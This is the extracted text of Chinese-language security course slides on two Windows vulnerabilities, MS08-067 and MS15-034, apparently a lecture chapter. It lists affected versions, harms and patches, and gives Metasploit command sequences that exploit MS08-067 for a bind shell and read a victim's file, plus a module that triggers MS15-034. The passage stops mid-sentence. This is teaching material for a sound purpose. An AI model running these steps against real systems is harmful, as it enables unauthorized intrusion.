计算机网络安全技术 课件 第五章 常见的系统漏洞.pptx
第五章常见的系统漏洞
5.1MS08_067漏洞
5.1.1MS08_067漏洞概述MS08-067漏洞的全称是“WindowsServer服务RPC请求缓冲区溢出漏洞”,是在MSRPCoverSMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的。在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,如果在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误,就可能被利用实施远程代码执行。
(1)MicrosoftWindows2000ServicePack4(2)WindowsXPServicePack2(3)WindowsXPServicePack3(4)WindowsXPProfessionalx64Edition(5)WindowsXPProfessionalx64EditionServicePack2(6)WindowsServer2003ServicePack1(7)WindowsServer2003ServicePack2(8)WindowsServer2003x64Edition(9)WindowsServer2003x64EditionServicePack2(10)WindowsServer2003SP15.1.2MS08_067漏洞影响的系统及版本
(11)WindowsServer2003SP2(12)WindowsVista和WindowsVistaServicePack1(13)WindowsVistax64Edition和WindowsVistax64EditionServicePack1(14)WindowsServer2008(用于32位系统)(15)WindowsServer2008(用于基于x64的系统)(16)WindowsServer2008(用于基于Itanium的系统)(17)Windows7Beta(用于32位系统)(18)Windows7Betax64Edition(19)Windows7Beta(用于基于Itanium的系统)
5.1.3MS08_067漏洞复现(1)在Metasploit工具终端使用msfconsole打开控制台后依次输入以下命令。使用该漏洞的利用模块:useexploit/windows/smb/ms08_067_netapi使用攻击载荷:setpayloadgeneric/shell_bind_tcp设置攻击机器监听端口:setlport4444设置攻击目标的IP地址:setrhosts执行攻击:exploit(2)执行“cd..”命令2次返回到根目录,执行“typetest.txt”命令查看被攻击计算机上C盘目录下的test.txt文件的内容。
5.1.4MS08_067漏洞造成的危害攻击者可以利用MS08_067漏洞获取目标主机的最高系统权限。
5.1.5修补措施(1)升级到最新的Windows操作系统。(2)安装KB958644补丁。
5.2MS15_034漏洞
5.2.1MS15_034漏洞概述HTTP协议堆栈(HTTP.sys)中存在一个远程代码执行漏洞,当HTTP.sys错误地解析特制HTTP请求时,会触发该漏洞。成功利用此漏洞的攻击者可以在系统账户的上下文中执行任意代码。
5.2.2MS15_034漏洞影响的系统及版本(1)WindowsServer2003。(2)WindowsVista。(3)WindowsServer2008。(4)Windows7。(5)WindowsServer2008R2。(6)Windows8和Windows8.1。(7)WindowsServer2012和WindowsServer2012R2。(8)WindowsRT和WindowsRT8.1。
(1)在Metasploit工具终端使用msfconsole打开控制台后依次输入以下命令。使用该漏洞的利用模块:useauxiliary/scanner/http/ms15_034_http_sys_memory_dump设置攻击目标的IP地址:setrhosts执行攻击:run(2)利用MS15_034漏洞。(3)查看目标计算机。(4)造成溢出,触发漏洞造